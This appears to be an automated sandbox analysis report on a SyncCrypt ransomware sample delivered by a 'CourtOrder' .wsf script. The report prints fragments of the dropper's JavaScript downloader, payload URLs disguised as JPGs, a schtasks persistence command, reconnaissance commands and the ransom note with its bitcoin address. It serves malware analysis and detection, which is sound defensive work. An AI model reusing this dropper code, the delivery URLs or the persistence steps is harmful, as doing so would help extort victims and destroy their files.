Source: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg | virustotal: 18/58 detections: Emsisoft: Trojan.Ransom.BTF (B), MicroWorld-eScan: Trojan.Ransom.BTF, McAfee-GW-Edition: SyncCrypt!Zip, GData: Trojan.Ransom.BTF, Sophos: Troj/SyncCt-A, McAfee: SyncCrypt!Zip, TrendMicro: TROJ_RANSOMNOTE.AUSTYV, Cyren: JPG/SyncCrypt.A, Symantec: Trojan.Randsom.A, BitDefender: Trojan.Ransom.BTF, TrendMicro-HouseCall: TROJ_RANSOMNOTE.AUSTYV, Arcabit: Trojan.Ransom.BTF, ViRobot: JPG.S.SyncCrypt.1040099, Ikarus: Trojan.Ransom, DrWeb: Trojan.Encoder.13697, Ad-Aware: Trojan.Ransom.BTF, AhnLab-V3: BinImage/Synccrypt, F-Secure: Trojan.Ransom.BTF | Perma Link |
Source: CourtOrder_845493809.wsf | virustotal: 36/58 detections: Avast: Other:Malware-gen [Trj], AVG: Other:Malware-gen [Trj], AegisLab: Troj.Script.Agent!c, Qihoo-360: Trojan.Generic, BitDefender: Trojan.Agent.CLKF, Emsisoft: Trojan.Agent.CLKF (B), MicroWorld-eScan: Trojan.Agent.CLKF, McAfee-GW-Edition: JS/Nemucod.xo, Fortinet: JS/Agent.SU!tr, GData: Script.Trojan-Downloader.SyncCrypt.A, Sophos: Mal/Psyme-A, McAfee: JS/Nemucod.xo, TrendMicro: JS_NEMUCOD.ELDSAUJG, Cyren: JS/Agent.SU!Eldorado, Symantec: JS.Downloader, Tencent: Js.Trojan.Raas.Auto, Panda: JS/Downloader.BRW, ZoneAlarm: HEUR:Trojan.Script.Agent.gen, TheHacker: VBS/Psyme, Rising: Trojan.Locky/JS!1.A549 (cloud:pT6AWwtp6PR), F-Prot: JS/Agent.SU!Eldorado, nProtect: Script-JS/W32.SyncCrypt-Downloader, CAT-QuickHeal: JS.Nemucod.EGL, ALYac: Trojan.Downloader.WSF.Agent, NANO-Antivirus: Trojan.Script.Heuristic-js.iacgm, Ad-Aware: Trojan.Agent.CLKF, AhnLab-V3: JS/Downloader, TrendMicro-HouseCall: JS_NEMUCOD.ELDSAUJG, Arcabit: Trojan.Agent.CLKF, Microsoft: TrojanDownloader:JS/Telicodeq.A, ViRobot: WSF.S.D | Perma Link |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAuHSaciHs234HFdvavCdAUL/dvBtWZo5e8SAkm19mQLX5VTzBoscekoJOoPHeAqGFHboj+8TQMZZl/tq5o7W4ZAjSkmEMmeNYgETNbnw8QLa1q4CtmU8W9QzTxcS+HFOo/gh0GYNMr1XqK/IksjhUYQREGnGp20jCeJmTEp+AWp5TvDtFRC/PzAVCuO | 5_2_00401630 |
Source: C:\Windows\System32\wscript.exe | File dropped: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\readme.html -> decryption sofware requires that you send <em>exactly the ammount of bitcoin (without the transaction fee)</em> that is written within the text file to the following address:<br><br><ul><li><em>15lk2bqxj2mjgzz3kcui3b4c42cqkkmqzk</em></li></ul><br>note that if the ammount sent doesn't match exactly the ammount in the text file, you will not receive the sofware, as it's the only way to validate and confirm the payment.<br><br><li>after the payment is done, send an email to all of the following addresses <a href="mailto:getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com">getmyfiles@keemail.me, getmyfiles@scryptmail.com, getmyfiles@mail2tor.com</a> containg:</li><ul><li><em>the file named key, located within the readme folder on your desktop, as an attachment</em> - this file is a locked version of the decryption key (that must be unlocked by us), used to recover your files. do not delete it if |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then sub esp, 1Ch | 5_2_004E6ED0 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 5_2_0045BED7 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then sub esp, 1Ch | 5_1_004E6ED0 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 5_1_0045BED7 |
Source: global traffic | HTTP traffic detected: GET /X8IOl.jpg HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US User-Agent: curl/7.51.0 Host: sm.uploads.im |
Source: global traffic | HTTP traffic detected: GET /mxRqXF/arrival.jpg HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US User-Agent: curl/7.51.0 Host: image.ibb.co |
Source: wscript.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo) |
Source: wscript.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: wscript.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo) |
Source: unknown | DNS traffic detected: queries for: image.ibb.co |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipe |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/appdata/local/temp/sfbi1uok.zipu |
Source: wscript.exe | String found in binary or memory: file:///c:/users/user/desktop/courtorder_845493809.wsf |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: http://185.10.202.115/images/arrival.jpg |
Source: wscript.exe | String found in binary or memory: http://185.10.202.115/images/arrival.jpgo |
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q |
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0 |
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0) |
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$ |
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0 |
Source: sync.exe | String found in binary or memory: http://gcc.gnu.org/bugs.html): |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0% |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0- |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/ |
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03 |
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0d |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: http://sm.uploads.im/x8iol.jpg |
Source: wscript.exe | String found in binary or memory: http://uploads.im/ |
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02 |
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0 |
Source: sync.exe | String found in binary or memory: http://www.openssl.org/support/faq.html |
Source: sync.exe | String found in binary or memory: http://www.openssl.org/support/faq.htmlrand |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0 |
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0 |
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1 |
Source: wscript.exe | String found in binary or memory: https://ibb.co/ |
Source: wscript.exe, CourtOrder_845493809.wsf | String found in binary or memory: https://image.ibb.co/mxrqxf/arrival.jpg |
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/cps0 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49195 |
Source: unknown | Network traffic detected: HTTP traffic on port 49195 -> 443 |
Source: | Initial file: function busy_sleep(e){for(passed=0;passed++!=e;)for(var t=(makeid(),makeid(),(new Date).getTime()+1e3);(new Date).getTime()<t;);}function unzip(e,t){var i,o,r=new ActiveXObject("Scripting.FileSystemObject"),n=new ActiveXObject("Shell.Application");t||(t="."),r.FolderExists(t)||r.CreateFolder(t),i=n.NameSpace(r.getFolder(t).Path),o=n.NameSpace(r.getFile(e).Path),r.FileExists(e)&&i.CopyHere(o.Items(),20)}function download(e,t){var i=new ActiveXObject("MSXML2.ServerXMLHTTP");i.open("GET",e,!1),i.setRequestHeader("User-Agent","curl/7.51.0"),i.setOption(2,13056);var o=6e4,r=6e4,n=6e4,s=6e4;if(i.setTimeouts(o,r,n,s),i.send(),200==i.status){var a=new ActiveXObject("Scripting.FileSystemObject");a.FileExists(t)&&a.DeleteFile(t);var c=new ActiveXObject("ADODB.Stream");return c.Open(),c.Type=1,c.Write(i.responseBody),c.Position=0,c.SaveToFile(t),c.Close(),0}return i.status}function makeid(){for(var e="",t="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",i=0;8>i;i++)e+=t.charAt(Math.floor(Math.random()*t. |
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 |
Source: C:\Windows\System32\cmd.exe | Directory queried: number of queries: 1045 |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\BACKUP~1\sync.exe |
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401500 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress, | 5_2_00401500 |
Source: sync.exe.0.dr | Static PE information: section name: .eh_fram |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00404A24 push eax; mov dword ptr [esp], 00000000h | 5_2_00404A3C |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_0057150F push ecx; mov dword ptr [esp], ebx | 5_2_00571549 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 push eax; mov dword ptr [esp], 00000BB8h | 5_2_004016AB |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 push eax; mov dword ptr [esp], ebx | 5_2_004016B9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00535FC0 push eax; mov dword ptr [esp], ebx | 5_2_005361C2 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00536D40 push eax; mov dword ptr [esp], ebx | 5_2_0053703F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00537310 push eax; mov dword ptr [esp], ebx | 5_2_0053760F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004E42D0 push eax; mov dword ptr [esp], esi | 5_2_004E4345 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00404A24 push eax; mov dword ptr [esp], 00000000h | 5_1_00404A3C |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_0057150F push ecx; mov dword ptr [esp], ebx | 5_1_00571549 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401630 push eax; mov dword ptr [esp], 00000BB8h | 5_1_004016AB |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401630 push eax; mov dword ptr [esp], ebx | 5_1_004016B9 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00535FC0 push eax; mov dword ptr [esp], ebx | 5_1_005361C2 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00536D40 push eax; mov dword ptr [esp], ebx | 5_1_0053703F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00537310 push eax; mov dword ptr [esp], ebx | 5_1_0053760F |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401630 CreateDirectoryA,Sleep,system,system,GetLogicalDriveStringsA,lstrlenA,GetDriveTypeA,lstrlenA,ShellExecuteExA,WaitForSingleObject,GetSystemWindowsDirectoryA,tolower,tolower,remove,time,srand,rand,malloc,fopen,fwrite,fclose,fopen,fopen,malloc,malloc,fwrite,fread,fwrite,fwrite,free,free,fclose,fclose,remove,_chmod,remove,remove,remove,system,system,system, | 5_2_00401630 |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: classification engine | Classification label: mal96.evad.rans.winWSF@16/7@4/4 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | File created: C:\Users\user\desktop\README\ |
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg |
Source: C:\Windows\System32\schtasks.exe | Console Write: ........a..u..0.............t...............................`.N...8...:...:.....P.#...N.........d.#..........WgZ..#.G..v |
Source: C:\Windows\System32\cmd.exe | Console Write: 1 file(s) moved |
Source: C:\Windows\System32\cmd.exe | Console Write: 1 file(s) moved |
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: CourtOrder_845493809.wsf | Virustotal: hash found |
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\CourtOrder_845493809.wsf' |
Source: unknown | Process created: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e 'C:\Users\user\desktop' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png' |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c net view |
Source: unknown | Process created: C:\Windows\System32\net.exe net view |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /CREATE /F /TN sync /TR 'C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe -e \'C:\Users\user\desktop\'' /sc once /st 11:24:00 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.html 'C:\Users\user\desktop\README\readme.html' |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c move /y readme.png 'C:\Users\user\desktop\README\readme.png' |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cmd /c net view |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c dir C:\ /s /b /a-d >> WAJSFDWJWP |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net view |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net view |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00413910 appears 113 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00414410 appears 267 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00406EA0 appears 60 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00440BB0 appears 172 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 004048A4 appears 48 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00448F80 appears 34 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00430AD0 appears 31 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00413950 appears 212 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 004333A0 appears 119 times | |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: String function: 00433B10 appears 46 times | |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts |
Source: CourtOrder_845493809.wsf | Initial sample: Strings found which are bigger than 50 |
Source: sync.exe, cmd.exe | Binary or memory string: Progman |
Source: sync.exe, cmd.exe | Binary or memory string: Program Manager |
Source: sync.exe, cmd.exe | Binary or memory string: Shell_TrayWnd |
Source: C:\Windows\System32\wscript.exe | File created: sync.exe.0.dr |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, | 5_2_00401170 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_1_00401170 Sleep,Sleep,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit, | 5_1_00401170 |
Source: C:\Windows\System32\wscript.exe | System information queried: KernelDebuggerInformation |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00415857 rdtsc | 5_2_00415857 |
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 3000 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Thread delayed: delay time: 1000 |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | API coverage: 3.1 % |
Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -240000s >= -60s |
Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -60000s >= -60s |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -3000s >= -60s |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -1000s >= -60s |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004356C7 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary, | 5_2_004356C7 |
Source: C:\Windows\System32\wscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.24.116.148 80 |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.27.127.62 187 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004D1780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, | 5_2_004D1780 |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00413770 GetStdHandle,GetFileType,_vsnprintf,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,_vsnprintf,WriteFile, | 5_2_00413770 |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid |
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004156B0 cpuid | 5_2_004156B0 |
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation |